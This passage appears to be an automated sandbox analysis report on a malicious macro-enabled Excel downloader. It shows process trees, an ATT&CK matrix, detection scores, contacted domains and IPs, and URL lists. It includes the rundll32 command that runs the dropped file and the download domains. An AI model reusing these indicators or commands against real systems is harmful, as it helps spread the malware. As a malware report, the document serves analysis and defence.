    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: statistic-2070252624.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    statistic-2070252624.xlsm6%VirustotalBrowse
    statistic-2070252624.xlsm57%ReversingLabsDocument-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    anaheimdermatologists.com3%VirustotalBrowse
    industrialarttextile.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    anaheimdermatologists.com
    192.185.5.2
    truefalseunknown
    industrialarttextile.com
    192.254.233.89
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
      high
      https://login.microsoftonline.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
        high
        https://shell.suite.office.com:1443D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
            high
            https://autodiscover-s.outlook.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                high
                https://cdn.entity.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                      high
                      https://powerlift.acompli.netD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                        high
                        https://cortana.aiD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                  high
                                  https://api.aadrm.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                        high
                                        https://cr.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControlD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/OfficeD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                              high
                                              https://graph.ppe.windows.netD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplateD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplateD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetectD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.msD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                              high
                                                              https://graph.windows.netD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                            high
                                                                                            http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.netD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                        • 0%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                            high
